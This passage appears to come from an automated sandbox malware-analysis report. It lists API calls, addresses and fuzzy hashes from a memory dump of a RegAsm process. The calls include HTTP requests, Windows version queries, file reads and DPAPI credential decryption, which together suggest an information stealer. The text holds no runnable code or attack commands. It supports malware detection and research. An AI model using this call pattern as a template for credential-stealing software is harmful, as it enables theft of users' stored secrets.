                                                                                                                                                                                                                                                                • Part of subcall function 00405114: HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 0040539A
                                                                                                                                                                                                                                                                • Part of subcall function 004116B1: _EH_prolog.MSVCRT ref: 004116B6
                                                                                                                                                                                                                                                                • Part of subcall function 004116B1: strtok_s.MSVCRT ref: 004116DD
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 004158B0
                                                                                                                                                                                                                                                                • Part of subcall function 00405114: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004053BF
                                                                                                                                                                                                                                                                • Part of subcall function 004116B1: strtok_s.MSVCRT ref: 0041171D
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressProc$H_prolog$Internetlstrcpy$Open$strtok_s$HeapProcesslstrcatlstrlen$AllocConnectDirectoryExitHttpInformationOptionRequestSleepSystemTimeVolumeWindows
                                                                                                                                                                                                                                                              • String ID: 5 Ar A
                                                                                                                                                                                                                                                              • API String ID: 3168723216-3291926139
                                                                                                                                                                                                                                                              • Opcode ID: 86f87955fcc1c16ebec1c5af04fe795e2ce60e0376ce5a452a8983ef4ce18e12
                                                                                                                                                                                                                                                              • Instruction ID: 3374eb596b5d5a0286ed6da2344d269bd5d9a88185801f0b009e9d551ef1266a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86f87955fcc1c16ebec1c5af04fe795e2ce60e0376ce5a452a8983ef4ce18e12
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C326F71D00258EADF10EBA5CD46BDDBBB8AF19304F5444AEF50473281DB781B588BA7
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 004147A4
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 004147D0
                                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,?,00000000), ref: 004147ED
                                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF,?,?,00000000), ref: 0041480D
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0041483C
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 0041484F
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$H_prologOpenQueryValuememset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2333602472-0
                                                                                                                                                                                                                                                              • Opcode ID: 23d6611d757252a73f0ad013c00bb11107bded11804397f685dc765b24b49186
                                                                                                                                                                                                                                                              • Instruction ID: c3499e38f8189600d531ca9067773349a2dd13f3b93546227b976a07357d8d78
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23d6611d757252a73f0ad013c00bb11107bded11804397f685dc765b24b49186
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 554180B1C4010DABCF10EFA5DC479DE7BBDEB04344F00446AF604A2190E7399B998F95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00403A0C
                                                                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT ref: 00403A3E
                                                                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT ref: 00403A47
                                                                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT ref: 00403A50
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403A6A
                                                                                                                                                                                                                                                              • InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403A7A
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CrackH_prologInternetlstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 503950642-0
                                                                                                                                                                                                                                                              • Opcode ID: 91fa16dd040635a00a2e9b63fea9752a583429d9250c32b45f5a4aec89c222b7
                                                                                                                                                                                                                                                              • Instruction ID: 2f8a022458d13e61e496b472b41c0555fc9e22f0f2bbbfe777871443f4a07e58
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91fa16dd040635a00a2e9b63fea9752a583429d9250c32b45f5a4aec89c222b7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB111C71D01218AACB14EFA5D845ADE7F78AF05324F20462AE425E72D0DB789B45CA54
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00406497
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00423B74,?,?,?,00423B6F,00000000), ref: 00406554
                                                                                                                                                                                                                                                                • Part of subcall function 0040E35E: lstrlen.KERNEL32(?,00000000,?,00415304,004244B3,004244B2,00000000,00000000,?,00415CB7), ref: 0040E367
                                                                                                                                                                                                                                                                • Part of subcall function 0040E35E: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E39B
                                                                                                                                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00423B78,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00423B73), ref: 004065CC
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000), ref: 004065E7
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00406548, 0040654D, 00406567
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$H_prolog$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                                                              • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                                                                                              • API String ID: 757424748-3463377506
                                                                                                                                                                                                                                                              • Opcode ID: 4839454172695e66329f3c4df5c3fa71ca6b00c885d6233381056ebeb16fa1c7
                                                                                                                                                                                                                                                              • Instruction ID: 43ce55d3e1cd6bde044dc6bd4eb531da728d52fb991cb47f02cf4b9312dcc2f3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4839454172695e66329f3c4df5c3fa71ca6b00c885d6233381056ebeb16fa1c7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0861C030800544EECB25EFA1DC11AADBF75AF18314F14546EB402332E2DB381A25DB99
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040B8FA
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: _EH_prolog.MSVCRT ref: 0040613D
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406160
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406177
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406193
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 004061AD
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                • Part of subcall function 0040F7EF: LocalAlloc.KERNEL32(00000040,00411C18,00000001,00000000,?,00411C17,00000000,00000000), ref: 0040F808
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040B94D
                                                                                                                                                                                                                                                                • Part of subcall function 004061EF: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058D6,00000000,00000000), ref: 0040620F
                                                                                                                                                                                                                                                                • Part of subcall function 004061EF: LocalAlloc.KERNEL32(00000040,004058D6,?,?,004058D6,00000000,?,?), ref: 0040621D
                                                                                                                                                                                                                                                                • Part of subcall function 004061EF: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058D6,00000000,00000000), ref: 00406233
                                                                                                                                                                                                                                                                • Part of subcall function 004061EF: LocalFree.KERNEL32(00000000,?,?,004058D6,00000000,?,?), ref: 00406242
                                                                                                                                                                                                                                                              • memcmp.MSVCRT ref: 0040B98B
                                                                                                                                                                                                                                                                • Part of subcall function 00406252: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406275
                                                                                                                                                                                                                                                                • Part of subcall function 00406252: LocalAlloc.KERNEL32(00000040,?,?), ref: 0040628D
                                                                                                                                                                                                                                                                • Part of subcall function 00406252: LocalFree.KERNEL32(?), ref: 004062AB
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Local$Alloc$CryptFile$BinaryFreeH_prologString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                                                                                                                              • String ID: $DPAPI
                                                                                                                                                                                                                                                              • API String ID: 2477620391-1819349886
                                                                                                                                                                                                                                                              • Opcode ID: 5ed004c30969e0cc65dd89488990c3e68523407aff077647a1b702d9de2502fe
                                                                                                                                                                                                                                                              • Instruction ID: 5462ebcd07b9b3f23ea230b439bca26bcb77bd97e8f1387946214589f9c78b7e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ed004c30969e0cc65dd89488990c3e68523407aff077647a1b702d9de2502fe
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD21A2F2900509ABCF11AB95CD039EFBB79EF04310F15013BFA02B11D1EB39A654C6A9
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413565,00000000,?,Windows: ,00000000,?,0042451C,00000000,?,Work Dir: In memory), ref: 0040F143
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00413565,00000000,?,Windows: ,00000000,?,0042451C,00000000,?,Work Dir: In memory,00000000,?), ref: 0040F14A
                                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00413565,00000000,?,Windows: ,00000000,?,0042451C,00000000,?), ref: 0040F178
                                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00413565,00000000,?,Windows: ,00000000,?,0042451C,00000000), ref: 0040F194
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                              • String ID: Windows 11
                                                                                                                                                                                                                                                              • API String ID: 3676486918-2517555085
                                                                                                                                                                                                                                                              • Opcode ID: 4c1697d9cb05b4db5057b5077521dec4cac67f92389f3bcf7131b559e4689ecb
                                                                                                                                                                                                                                                              • Instruction ID: 7bc758894e67b39e7d898eda6472a7f8de8691deac7626c15fb90c1d10f9c35c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c1697d9cb05b4db5057b5077521dec4cac67f92389f3bcf7131b559e4689ecb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43F04F71640205FBEB245BE1EC0AF6E7A7EEB44B40F105035BA01AA1E0E7B49A159B68
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,0040E648,0040F157,?,?,?,00413565,00000000,?,Windows: ,00000000), ref: 0040E5EA
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,0040E648,0040F157,?,?,?,00413565,00000000,?,Windows: ,00000000,?,0042451C), ref: 0040E5F1
                                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,0040E648,0040F157,?,?,?,00413565,00000000,?,Windows: ), ref: 0040E60F
                                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,0040E648,0040F157,?,?,?,00413565,00000000), ref: 0040E62A
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                              • String ID: CurrentBuildNumber
                                                                                                                                                                                                                                                              • API String ID: 3676486918-1022791448
                                                                                                                                                                                                                                                              • Opcode ID: 549e49055244fb50ba3e643d806a6003bcdca7952e55b5f0cffcd51b8ddef338
                                                                                                                                                                                                                                                              • Instruction ID: b7f42767185e9f38a1ff468a9371dc0538b1b369f25423ee430d375e0e4f8806
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 549e49055244fb50ba3e643d806a6003bcdca7952e55b5f0cffcd51b8ddef338
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83F01D71640204FBEB145BA1EC0AF6E7A7DEB44B04F201025FA01A5091EBB559119A68
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040FADD
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040FAFF
                                                                                                                                                                                                                                                                • Part of subcall function 0040F72E: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,0040FB2C,00000000), ref: 0040F739
                                                                                                                                                                                                                                                                • Part of subcall function 0040F72E: HeapAlloc.KERNEL32(00000000,?,0040FB2C,00000000), ref: 0040F740
                                                                                                                                                                                                                                                                • Part of subcall function 0040F72E: wsprintfW.USER32 ref: 0040F751
                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00001001,00000000,?,?,00000000), ref: 0040FB86
                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0040FB94
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040FB9B
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Process$Heap$AllocCloseH_prologHandleOpenTerminatememsetwsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1628159694-0
                                                                                                                                                                                                                                                              • Opcode ID: 4f46d6f5657ef04c19491e7227cdabfccf2d2a6ab8f92815efd4e5350b4c56dc
                                                                                                                                                                                                                                                              • Instruction ID: 6225231a9b0983545f3dd611d0008504d281c271a7b0928af5f5abbaa91495a4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f46d6f5657ef04c19491e7227cdabfccf2d2a6ab8f92815efd4e5350b4c56dc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91312972A01118ABCB21EBA1DC85DEFBB79FF05350F10046AF506F2191D7789A84CBE5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

